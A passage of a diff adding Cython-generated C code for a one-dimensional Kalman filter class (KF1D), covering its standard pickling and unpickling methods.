+PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4__reduce_cython__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4__reduce_cython__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + PyObject *__pyx_t_14 = NULL; + PyObject *__pyx_t_15 = NULL; + int __pyx_t_16; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = (self.A0_0, self.A0_1, self.A1_0, self.A1_1, self.A_K_0, self.A_K_1, self.A_K_2, self.A_K_3, self.C0_0, self.C0_1, self.K0_0, self.K1_0, self.x0_0, self.x1_0) # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_self->A0_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_self->A1_0); if (unlikely(!__pyx_t_3)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_self->A1_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_self->A_K_0); if (unlikely(!__pyx_t_5)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyFloat_FromDouble(__pyx_v_self->A_K_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyFloat_FromDouble(__pyx_v_self->A_K_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = PyFloat_FromDouble(__pyx_v_self->A_K_3); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_9 = PyFloat_FromDouble(__pyx_v_self->C0_0); if (unlikely(!__pyx_t_9)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_10 = PyFloat_FromDouble(__pyx_v_self->C0_1); if (unlikely(!__pyx_t_10)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_11 = PyFloat_FromDouble(__pyx_v_self->K0_0); if (unlikely(!__pyx_t_11)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_12 = PyFloat_FromDouble(__pyx_v_self->K1_0); if (unlikely(!__pyx_t_12)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_12); + __pyx_t_13 = PyFloat_FromDouble(__pyx_v_self->x0_0); if (unlikely(!__pyx_t_13)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_13); + __pyx_t_14 = PyFloat_FromDouble(__pyx_v_self->x1_0); if (unlikely(!__pyx_t_14)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_14); + __pyx_t_15 = PyTuple_New(14); if (unlikely(!__pyx_t_15)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_15, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_15, 1, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_15, 2, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_15, 3, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_15, 4, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_15, 5, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_15, 6, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_8); + PyTuple_SET_ITEM(__pyx_t_15, 7, __pyx_t_8); + __Pyx_GIVEREF(__pyx_t_9); + PyTuple_SET_ITEM(__pyx_t_15, 8, __pyx_t_9); + __Pyx_GIVEREF(__pyx_t_10); + PyTuple_SET_ITEM(__pyx_t_15, 9, __pyx_t_10); + __Pyx_GIVEREF(__pyx_t_11); + PyTuple_SET_ITEM(__pyx_t_15, 10, __pyx_t_11); + __Pyx_GIVEREF(__pyx_t_12); + PyTuple_SET_ITEM(__pyx_t_15, 11, __pyx_t_12); + __Pyx_GIVEREF(__pyx_t_13); + PyTuple_SET_ITEM(__pyx_t_15, 12, __pyx_t_13); + __Pyx_GIVEREF(__pyx_t_14); + PyTuple_SET_ITEM(__pyx_t_15, 13, __pyx_t_14); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_8 = 0; + __pyx_t_9 = 0; + __pyx_t_10 = 0; + __pyx_t_11 = 0; + __pyx_t_12 = 0; + __pyx_t_13 = 0; + __pyx_t_14 = 0; + __pyx_v_state = ((PyObject*)__pyx_t_15); + __pyx_t_15 = 0; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = (self.A0_0, self.A0_1, self.A1_0, self.A1_1, self.A_K_0, self.A_K_1, self.A_K_2, self.A_K_3, self.C0_0, self.C0_1, self.K0_0, self.K1_0, self.x0_0, self.x1_0) + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_15 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_15)) __PYX_ERR(2, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __pyx_v__dict = __pyx_t_15; + __pyx_t_15 = 0; + + /* "(tree fragment)":7 + * state = (self.A0_0, self.A0_1, self.A1_0, self.A1_1, self.A_K_0, self.A_K_1, self.A_K_2, self.A_K_3, self.C0_0, self.C0_1, self.K0_0, self.K1_0, self.x0_0, self.x1_0) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_16 = (__pyx_v__dict != Py_None); + if (__pyx_t_16) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_15 = PyTuple_New(1); if (unlikely(!__pyx_t_15)) __PYX_ERR(2, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_15, 0, __pyx_v__dict); + __pyx_t_14 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_15); if (unlikely(!__pyx_t_14)) __PYX_ERR(2, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_14); + __Pyx_DECREF(__pyx_t_15); __pyx_t_15 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_14)); + __pyx_t_14 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = False + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = (self.A0_0, self.A0_1, self.A1_0, self.A1_1, self.A_K_0, self.A_K_1, self.A_K_2, self.A_K_3, self.C0_0, self.C0_1, self.K0_0, self.K1_0, self.x0_0, self.x1_0) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = False # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, None), state + */ + /*else*/ { + __pyx_v_use_setstate = 0; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = False + * if use_setstate: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_14, __pyx_n_s_pyx_unpickle_KF1D); if (unlikely(!__pyx_t_14)) __PYX_ERR(2, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_14); + __pyx_t_15 = PyTuple_New(3); if (unlikely(!__pyx_t_15)) __PYX_ERR(2, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_15, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_266195929); + __Pyx_GIVEREF(__pyx_int_266195929); + PyTuple_SET_ITEM(__pyx_t_15, 1, __pyx_int_266195929); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_15, 2, Py_None); + __pyx_t_13 = PyTuple_New(3); if (unlikely(!__pyx_t_13)) __PYX_ERR(2, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_13); + __Pyx_GIVEREF(__pyx_t_14); + PyTuple_SET_ITEM(__pyx_t_13, 0, __pyx_t_14); + __Pyx_GIVEREF(__pyx_t_15); + PyTuple_SET_ITEM(__pyx_t_13, 1, __pyx_t_15); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_13, 2, __pyx_v_state); + __pyx_t_14 = 0; + __pyx_t_15 = 0; + __pyx_r = __pyx_t_13; + __pyx_t_13 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, None), state + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_13, __pyx_n_s_pyx_unpickle_KF1D); if (unlikely(!__pyx_t_13)) __PYX_ERR(2, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_13); + __pyx_t_15 = PyTuple_New(3); if (unlikely(!__pyx_t_15)) __PYX_ERR(2, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_15, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_266195929); + __Pyx_GIVEREF(__pyx_int_266195929); + PyTuple_SET_ITEM(__pyx_t_15, 1, __pyx_int_266195929); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_15, 2, __pyx_v_state); + __pyx_t_14 = PyTuple_New(2); if (unlikely(!__pyx_t_14)) __PYX_ERR(2, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_14); + __Pyx_GIVEREF(__pyx_t_13); + PyTuple_SET_ITEM(__pyx_t_14, 0, __pyx_t_13); + __Pyx_GIVEREF(__pyx_t_15); + PyTuple_SET_ITEM(__pyx_t_14, 1, __pyx_t_15); + __pyx_t_13 = 0; + __pyx_t_15 = 0; + __pyx_r = __pyx_t_14; + __pyx_t_14 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_9); + __Pyx_XDECREF(__pyx_t_10); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_XDECREF(__pyx_t_12); + __Pyx_XDECREF(__pyx_t_13); + __Pyx_XDECREF(__pyx_t_14); + __Pyx_XDECREF(__pyx_t_15); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(2, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(2, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(2, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_6__setstate_cython__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_6__setstate_cython__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(2, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_f_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __pyx_unpickle_KF1D(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_1__pyx_unpickle_KF1D(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_6kalman_18simple_kalman_impl_1__pyx_unpickle_KF1D = {"__pyx_unpickle_KF1D", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_1__pyx_unpickle_KF1D, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_1__pyx_unpickle_KF1D(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle_KF1D (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(2, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(2, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_KF1D", 1, 3, 3, 1); __PYX_ERR(2, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(2, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_KF1D", 1, 3, 3, 2); __PYX_ERR(2, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle_KF1D") < 0)) __PYX_ERR(2, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(2, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_KF1D", 1, 3, 3, __pyx_nargs); __PYX_ERR(2, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.__pyx_unpickle_KF1D", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_KF1D", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xfddd3d9, 0xdbf7d68, 0x3439d7a): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple_, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(2, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0xfddd3d9, 0xdbf7d68, 0x3439d7a): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + * __pyx_result = KF1D.__new__(__pyx_type) + */ + 